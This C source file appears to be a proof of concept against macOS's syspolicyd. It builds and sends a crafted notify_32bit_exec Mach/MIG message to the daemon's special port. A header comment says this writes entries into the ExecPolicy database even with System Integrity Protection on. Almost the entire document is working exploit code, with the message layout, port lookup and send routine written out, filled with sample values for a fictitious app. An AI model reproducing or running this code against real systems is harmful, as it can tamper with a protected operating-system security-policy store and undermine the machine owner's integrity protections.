Example of sending a notify_32bit_exec MIG message to syspolicyd
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <mach/mach.h>
/*
This allows you to write to /var/db/SystemPolicyConfiguration/ExecPolicy
even with SIP on: before syspolicyd determines whether the values you
pass can be checked, it saves them to the ExecPolicy database.
Errors still occur when a real application is passed in:
default 08:22:28.588787 -0500 trustd asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0)
default 08:22:28.617267 -0500 syspolicyd -[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private>
error 08:22:28.617885 -0500 syspolicyd failed to call driver: 0x3
*/
/*
 * Wire layout of the hand-built notify_32bit_exec message sent to
 * syspolicyd (msgh_id 0x48a8).  Field order and sizes are the message
 * format, so nothing here may be reordered or padded.  Every member is
 * 4-byte aligned, so no implicit padding is expected (1308 bytes total
 * if that holds -- worth confirming with sizeof before relying on it).
 *
 * Members named u1..u6 are unlabeled words carried over from the author's
 * reversing; main() sends them as 0, except u2 = 1.  NOTE(review): the
 * 0,1 pair in u1/u2 looks like the 8-byte NDR record a MIG request
 * carries right after the header -- presumably, confirm against the MIG
 * definition.
 */
struct message {
mach_msg_header_t hdr;       /* standard Mach header; simple (non-complex) message, no descriptors */
uint32_t u1;                 /* unlabeled, sent as 0 */
uint32_t u2;                 /* unlabeled, sent as 1 */
uint32_t eval_id;            /* sent as 2; meaning not documented here */
uint32_t u3;                 /* unlabeled, sent as 0 */
uid_t uid;                   /* uid the notification claims for the process */
pid_t pid;                   /* pid the notification claims for the process */
uint32_t u4;                 /* unlabeled, sent as 0 */
uint32_t path_size;          /* capacity of path (1024) -- the whole buffer is sent, not the string length */
char path[1024];             /* NUL-padded path of the binary */
uint32_t u5;                 /* unlabeled, sent as 0 */
uint32_t team_id_size;       /* capacity of team_id (64) */
char team_id[64];            /* NUL-padded team identifier */
uint32_t u6;                 /* unlabeled, sent as 0 */
uint32_t signing_id_size;    /* capacity of signing_id (128) */
char signing_id[128];        /* NUL-padded signing identifier */
char cdhash[20];             /* raw 20-byte code directory hash; binary, no terminator */
};
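/* MIG routine id of the notify_32bit_exec message accepted by syspolicyd. */
enum { NOTIFY_32BIT_EXEC_MSGH_ID = 0x48a8 };

/*
 * Sample values the message is filled with.  They describe a fictitious
 * application.  The cdhash is raw binary, so it is kept as a fixed-size
 * byte array and copied with memcpy(); a real hash containing a 0x00 byte
 * would be truncated by a strncpy().
 */
static const char sample_path[] = "/Applications/FakeApp.app";
static const char sample_team_id[] = "ABCDEFGHIJ";
static const char sample_signing_id[] = "com.fake.bundle.Id";
static const char sample_cdhash[20] =
    "\xd7\x4a\x6b\x33\x0a\x8c\x67\xc4\x8f\xc0\xf8\xbb\xc7\xe0\xdc\x46\x55\xe2\x44\xb8";
static const uid_t sample_uid = 502;
static const pid_t sample_pid = 1;

/*
 * Report a failed Mach call on stderr (with the kernel's text for the
 * return code) and terminate with EXIT_FAILURE.  Never returns.
 */
static void
die_kr(const char *what, kern_return_t kr)
{
    fprintf(stderr, "%s: %s (0x%x)\n", what, mach_error_string(kr), (unsigned)kr);
    exit(EXIT_FAILURE);
}

/*
 * Copy a sample string into a fixed-size message field, zero-filling the
 * unused tail so no stack contents are sent.
 * Returns 0 on success, -1 if the string plus its terminator does not fit.
 */
static int
set_field(char *field, size_t field_size, const char *value)
{
    memset(field, 0, field_size);
    int n = snprintf(field, field_size, "%s", value);
    return (n < 0 || (size_t)n >= field_size) ? -1 : 0;
}

/*
 * Fill *m with the header and sample body of one notify_32bit_exec
 * message addressed to `dest`.  The struct is zeroed first so the
 * unlabeled words (u1..u6) go out as 0 and no uninitialized bytes are
 * sent.  Returns 0, or -1 if a sample string does not fit its field.
 */
static int
build_message(struct message *m, mach_port_t dest)
{
    memset(m, 0, sizeof *m);

    /* Simple (non-COMPLEX) message: all data inline, no descriptors.
     * MOVE_SEND puts our send right into the message; it is consumed by
     * a successful send, so dest must not be used afterwards. */
    m->hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND);
    m->hdr.msgh_size = sizeof *m;
    m->hdr.msgh_remote_port = dest;
    m->hdr.msgh_local_port = MACH_PORT_NULL;   /* no reply port: fire and forget */
    m->hdr.msgh_voucher_port = MACH_PORT_NULL;
    m->hdr.msgh_id = NOTIFY_32BIT_EXEC_MSGH_ID;

    /* u2 and eval_id keep the values the original proof of concept sent;
     * their meaning is not documented here. */
    m->u2 = 1;
    m->eval_id = 2;
    m->uid = sample_uid;
    m->pid = sample_pid;

    /* The *_size words carry each field's capacity -- the whole buffer
     * is transmitted -- not the string length. */
    m->path_size = sizeof m->path;
    m->team_id_size = sizeof m->team_id;
    m->signing_id_size = sizeof m->signing_id;

    if (set_field(m->path, sizeof m->path, sample_path) != 0 ||
        set_field(m->team_id, sizeof m->team_id, sample_team_id) != 0 ||
        set_field(m->signing_id, sizeof m->signing_id, sample_signing_id) != 0) {
        return -1;
    }
    memcpy(m->cdhash, sample_cdhash, sizeof m->cdhash);
    return 0;
}

/*
 * Entry point: obtain the host-private port, resolve syspolicyd's host
 * special port, and send one hand-built notify_32bit_exec message with
 * the sample values above.
 *
 * Exit status: 0 on success, EXIT_FAILURE if any step fails.  The
 * host-private port is only handed to a privileged (root) caller, so an
 * unprivileged run stops at the first Mach call.  The port rights still
 * held at return are released by process exit.
 */
int
main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    mach_port_t host = mach_host_self();
    if (host == MACH_PORT_NULL) {
        fprintf(stderr, "mach_host_self returned MACH_PORT_NULL\n");
        return EXIT_FAILURE;
    }

    mach_port_t host_priv = MACH_PORT_NULL;
    kern_return_t kr = host_get_host_priv_port(host, &host_priv);
    if (kr != KERN_SUCCESS) {
        die_kr("host_get_host_priv_port", kr);
    }

    mach_port_t asp_port = MACH_PORT_NULL;
    kr = host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_SYSPOLICYD_PORT, &asp_port);
    if (kr != KERN_SUCCESS) {
        die_kr("host_get_special_port(HOST_SYSPOLICYD_PORT)", kr);
    }

    struct message msg;
    if (build_message(&msg, asp_port) != 0) {
        fprintf(stderr, "sample value does not fit its message field\n");
        return EXIT_FAILURE;
    }

    kr = mach_msg(&msg.hdr, MACH_SEND_MSG, sizeof msg, 0,
                  MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) {
        die_kr("mach_msg(MACH_SEND_MSG)", kr);
    }

    return 0;
}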